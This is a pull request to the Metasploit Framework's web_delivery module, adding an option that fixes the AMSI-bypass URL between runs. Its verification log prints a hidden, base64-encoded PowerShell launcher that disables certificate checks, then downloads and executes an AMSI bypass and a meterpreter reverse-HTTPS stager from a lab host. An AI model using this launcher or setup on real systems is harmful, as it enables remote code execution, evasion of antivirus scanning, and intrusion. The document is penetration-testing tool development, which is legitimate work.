### PR TITLE
Add PSH-AmsiBypassURI option to allow persistent web_delivery

### DIFF
--- a/modules/exploits/multi/script/web_delivery.rb
+++ b/modules/exploits/multi/script/web_delivery.rb
@@ -112,6 +112,7 @@ class MetasploitModule < Msf::Exploit::Remote
   register_advanced_options(
     [
       OptBool.new('PSH-AmsiBypass',       [ true,  'PSH - Request AMSI/SBL bypass before the stager', true ]),
+      OptString.new('PSH-AmsiBypassURI',  [ false, 'PSH - The URL to use for the AMSI/SBL bypass (Will be random if left blank)', '' ]),
       OptBool.new('PSH-EncodedCommand',   [ true,  'PSH - Use -EncodedCommand for web_delivery launcher', true ]),
       OptBool.new('PSH-ForceTLS12',       [ true,  'PSH - Force use of TLS v1.2', true ]),
       OptBool.new('PSH-Proxy',            [ true,  'PSH - Use the system proxy', true ]),
@@ -159,6 +160,9 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def amsi_bypass_uri
+    unless datastore['PSH-AmsiBypassURI'].empty?
+      @amsi_uri = datastore['PSH-AmsiBypassURI']
+    end
     @amsi_uri ||= random_uri
   end
 


### PR DESCRIPTION
This change adds a PSH-AmsiBypassURI option that allows web_delivery to be persistent between runs.
Fixes https://github.com/rapid7/metasploit-framework/issues/13046

## Verification

```
$ cat winweb.rc
use exploit/multi/script/web_delivery
set SRVHOST 192.168.56.1
set LHOST 192.168.56.1
set LPORT 4444
set target 2
set URIPATH /uri
set PSH-AmsiBypassURI /amsi_get_out_of_my_way
set SSL true
set payload windows/x64/meterpreter/reverse_https
# not sure if these are needed
set AutoLoadStdapi false
set AutoVerifySession false
set AutoSystemInfo false

exploit

$ ./msfconsole -qr winweb.rc
[*] Processing winweb.rc for ERB directives.
resource (winweb.rc)> use exploit/multi/script/web_delivery
resource (winweb.rc)> set SRVHOST 192.168.56.1
SRVHOST => 192.168.56.1
resource (winweb.rc)> set LHOST 192.168.56.1
LHOST => 192.168.56.1
resource (winweb.rc)> set LPORT 4444
LPORT => 4444
resource (winweb.rc)> set target 2
target => 2
resource (winweb.rc)> set URIPATH /uri
URIPATH => /uri
resource (winweb.rc)> set PSH-AmsiBypassURI /amsi_get_out_of_my_way
PSH-AmsiBypassURI => /amsi_get_out_of_my_way
resource (winweb.rc)> set SSL true
SSL => true
resource (winweb.rc)> set payload windows/x64/meterpreter/reverse_https
payload => windows/x64/meterpreter/reverse_https
resource (winweb.rc)> set AutoLoadStdapi false
AutoLoadStdapi => false
resource (winweb.rc)> set AutoVerifySession false
AutoVerifySession => false
resource (winweb.rc)> set AutoSystemInfo false
AutoSystemInfo => false
resource (winweb.rc)> exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf5 exploit(multi/script/web_delivery) >
[*] Started HTTPS reverse handler on https://192.168.56.1:4444
[*] Using URL: https://192.168.56.1:8080/uri
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAPQB7ACQAdAByAHUAZQB9ADsAJABCAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwBpAGYAKABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBQAHIAbwB4AHkAXQA6ADoARwBlAHQARABlAGYAYQB1AGwAdABQAHIAbwB4AHkAKAApAC4AYQBkAGQAcgBlAHMAcwAgAC0AbgBlACAAJABuAHUAbABsACkAewAkAEIALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsAJABCAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwAxADkAMgAuADEANgA4AC4ANQA2AC4AMQA6ADgAMAA4ADAALwB1AHIAaQAvAGEAbQBzAGkAXwBnAGUAdABfAG8AdQB0AF8AbwBmAF8AbQB5AF8AdwBhAHkAJwApACkAOwBJAEUAWAAgACgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQA5ADIALgAxADYAOAAuADUANgAuADEAOgA4ADAAOAAwAC8AdQByAGkAJwApACkAOwA=

```
## Verify:
- [x] The powershell command is the same each time you run the script
- [ ] :shell: (don't forget to `meterpreter > load stdapi`)
